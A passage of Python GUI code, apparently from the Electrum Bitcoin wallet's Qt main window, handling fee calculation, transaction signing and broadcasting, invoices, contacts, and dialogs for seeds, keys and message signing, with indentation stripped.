vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method, args, self.password_dialog, **kwargs)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
